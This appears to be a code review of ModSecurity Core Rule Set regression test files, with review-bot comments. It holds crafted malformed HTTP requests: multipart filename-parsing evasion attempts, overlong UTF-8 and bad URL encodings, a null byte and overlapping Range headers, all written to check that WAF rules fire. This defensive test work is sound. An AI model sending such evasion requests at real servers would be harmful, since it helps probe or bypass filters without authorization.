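Review bot: Errors 108 and 109 in the ERRORS section show that test-file content reaches Perl eval during expression evaluation and fuzzing ("The expression probably includes some Perl syntax"), but the documentation never states that test files are effectively executed as code. Say so explicitly in the VARIABLE SUBSTITUTION section, so that test files from untrusted sources are not run on the ModSecurity host. The `%var` synopsis also has an unclosed quote and a mis-encoded ellipsis (`valueM-^E..`), and the text needs a spelling pass: "reuqest", "specificaiton", "occured", "evulator", and "than" for "then".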

View File

@@ -0,0 +1,599 @@
%timeout 10
# FILE 20 - protocol violations
%test Invalid HTTP Request Line (960911) - Test 1
#####################################################
%remark
This test has a TAB character before the request method.
%endremark
%status 400|403
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Invalid HTTP Request Line (960911) - Test 2
#####################################################
%remark
This test uses backslashes instead of forward slashes.
%endremark
%status 400|403
%request
GET \index.html HTTP\1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Invalid HTTP Request Line (960911) - Test 3
#####################################################
%remark
This test has a pipe character before the request method.
%endremark
%status 400|403|501
%output 960911
%request
|GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Attempted multipart/form-data bypass (960000)
#####################################################
%remark
This test attempts form name parsing evasion using '.
%endremark
%output 960000
%request
POST /cgi-bin/fup.cgi HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/upload.html
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Content-Length: $CONTENT_LENGTH
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name=x';filename="';name=contact.txt;"
Content-Type: text/plain
email: security@modsecurity.org
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="note"
Contact info.
-----------------------------627652292512397580456702590--
%test Failed to parse request body (960912)
#####################################################
%remark
Part missing Content-Disposition header
%endremark
%output 960912
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Contt-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
%test Multipart request body failed strict validation (960914)
#####################################################
%output 960914
%remark
Invalid Quoting
%endremark
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Content-Disposition: form-data; name='name; filename="'; name=payload;"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
%test Multipart parser detected a possible unmatched boundary (960915)
#####################################################
%remark
Unmatched final boundary
%endremark
%output 960915
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915725--
%test Invalid Request Body (960000)
#####################################################
%remark
Invalid Quoting
%endremark
%output 960000
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: $CONTENT_LENGTH
-----------------------------265001916915724
Content-Disposition: form-data; name="fi;le"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
%test Invalid Request Body/XML (960912)
#####################################################
%remark
Incorrect ending error tag </err>
%endremark
%output 960912
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.3.2/form.html
Content-Type: text/xml
Content-Length: $CONTENT_LENGTH
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<SOAP-ENV:Body>
<xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2">
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>
<xkms:RespondWith>http://www.w3.org/2002/03/xkms#X509Cert</xkms:RespondWith>
</xkms:StatusRequest>
</SOAP-ENV:Body><error></err>
</SOAP-ENV:Envelope>
%test Content-Length HTTP header is not numeric (960016)
#####################################################
%remark
When Apache received multiple headers with the same name, it will contat them into one header with commas separating the individual payloads.
%endremark
%status 413|400
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Content-Length: 3
abc
%test Content-Length HTTP header is not numeric (960016)
#####################################################
%remark
Content-Length should only contain digits. This has a semi-colon.
%endremark
%status 413|400
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3;
abc
%test GET or HEAD Request with Body Content (960011)
#####################################################
%remark
This request sends a request body while using a GET request.
%endremark
#%status 400
%output 960011
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
abc
%test POST request missing Content-Length Header (960012)
#####################################################
%output 960012
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
%test Invalid Use of Identity Encoding (960902)
#####################################################
%output 960902
%event 960902
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Encoding: Identity
%test Expect Header Not Allowed for HTTP 1.0 (960022)
#####################################################
%output 960022
%event 960022
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Expect: 100-continue
%test Pragma Header requires Cache-Control Header for HTTP/1.1 requests (960020)
#####################################################
%output 960020
%event 960020
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Pragma: no-cache
%test Range: field exists and begins with 0 (958291)
#####################################################
%output 958291
%event 958291
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Range: bytes=0-
%test Range: Invalid Last Byte Value (958230)
#####################################################
%output 958230
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
Keep-Alive: 300
Proxy-Connection: keep-alive
Connection: close
%test Range: Too many fields (958231)
#####################################################
%output 958231
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
Keep-Alive: 300
Proxy-Connection: keep-alive
Connection: close
%test Multiple/Conflicting Connection Header Data Found (958295)
#####################################################
%output 958295
%event 958295
%var connection=keep-alive
%var connection=close
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Connection: $connection, $connection
%test URL Encoding Abuse Attack Attempt (950107)
#####################################################
%output 950107
%event 950107
%var encoded_arg=%1G
%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33%
%request
GET /?parm=$encoded_arg HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Multiple URL Encoding Detected (950109)
#####################################################
%output 950109
%event 950109
%var encoded_arg=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34
#%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33%
%request
GET /?parm=$encoded_arg HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test URL Encoding Abuse Attack Attempt (950108)
#####################################################
%output 950108
%event 950108
%var encoded_arg=%1G
%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33%
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
param=$encoded_arg
%test URL Encoding Abuse Attack Attempt/XML (950108)
#####################################################
%output 950108
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: text/xml
Content-Length: $CONTENT_LENGTH
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<SOAP-ENV:Body>
<xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2">
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism>
<xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith>
</xkms:StatusRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
%test UTF8 Encoding Abuse Attack Attempt (950801)
#####################################################
%output 950801
%var arg=%c0%af
%var arg=%c0
%var arg=%F5%80%BF%BF
%request
GET /?param=$arg HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Unicode Full/Half Width Abuse Attack Attempt (950116)
#####################################################
%output 950116
%request
GET /?param=foo%uFF01 HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Proxy access attempt (960014)
#####################################################
%output 960014
%request
GET http://www.some_remote_site.com/ HTTP/1.0
Host: www.some_remote_site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Invalid character in request (960901)
#####################################################
%output 960901
%event 960901
%request
GET /?param=foo%00 HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest
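
Review bot: Tests 1 and 2 for 960911 and both 960016 tests assert only on `%status` (`400|403` and `413|400`), so they can pass when the web server itself rejects the request, whether or not the rule matched. Where the rule id is observable, add `%output 960911` as Test 3 does, and `%output 960016` for the Content-Length cases; otherwise say in the `%remark` that only the status is checked. The two 960016 tests also share one name, which makes them indistinguishable in the report. The 958230 and 958231 tests send the identical `Range:` header, so neither isolates its rule; give 958230 a single range whose last byte is below the first, and 958231 a long list of otherwise valid ranges.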

View File

@@ -0,0 +1,126 @@
%timeout 10
# FILE 21 - protocol anomalies
%test Request Missing a Host Header (960008)
#####################################################
%output 960008
%request
GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Empty Host Header (960007)
#####################################################
%output 960007
%request
GET / HTTP/1.0
Host:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Missing an Accept Header (960015)
#####################################################
%output 960015
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Has an Empty Accept Header (960021)
#####################################################
%output 960021
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept:
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Missing a User Agent Header (960009)
#####################################################
%output 960009
%request
GET / HTTP/1.0
Host: $hostname
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Has an Empty User Agent Header (960006)
#####################################################
%output 960006
%request
GET / HTTP/1.0
Host: $hostname
User-Agent:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Containing Content, but Missing Content-Type header (960904)
#####################################################
%output 960904
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Length: 5
foo=1
%test Host header is a numeric IP address (960017)
#####################################################
%output 960017
%request
GET / HTTP/1.0
Host: 192.168.1.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest
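
Review bot: The 960904 test hard-codes `Content-Length: 5`, while most other tests that carry a body use `$CONTENT_LENGTH`; the value is correct for `foo=1` today but goes stale as soon as the body is edited. Use `$CONTENT_LENGTH` here as well. None of the tests in this file has a `%remark`; a one-line remark per test stating which header is deliberately missing, empty or numeric would make a failed run easier to read.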

File diff suppressed because one or more lines are too long

View File

@@ -0,0 +1,119 @@
%timeout 10
# FILE 30 - HTTP Policy
%test Method is not allowed by policy (960032)
#####################################################
%output 960032
%var request_method=DELETE
%var request_method=FOO
%var request_method=SUBSCRIBE
%request
$request_method / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request content type is not allowed by policy (960010)
#####################################################
%output 960010
%var type=multipart/;
%var type=multipart/foo;
%var type=application/foo;
%request
POST / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: $type boundary=0000
Content-Length: $CONTENT_LENGTH
--0000
Content-Disposition: form-data; name="name"
John Smith
--0000
Content-Disposition: form-data; name="email"
john.smith@example.com
--0000
Content-Disposition: form-data; name="image"; filename="image.jpg"
Content-Type: image/jpeg
BINARYDATA
--0000--
%test HTTP protocol version is not allowed by policy (960034)
#####################################################
%output 960034
%var http=HTTP/3.0
%var http=HTTP/0.8
%var http=JUNK/1.0
%request
GET / $http
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test URL file extension is restricted by policy (960035)
#####################################################
%output 960035
%var ext=.bak
%var ext=.db
%var ext=.old
%request
GET /foo$ext HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test HTTP header is restricted by policy (960038)
#####################################################
%output 960038
%var restricted_header=Proxy-Connection: keep-alive
%var restricted_header=Translate: f
%var restricted_header=Lock-Token: <opaquelocktoken:a515cfa4-5da4-22e1-f5bf-00a0451e6bf7>
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
$restricted_header
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest
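
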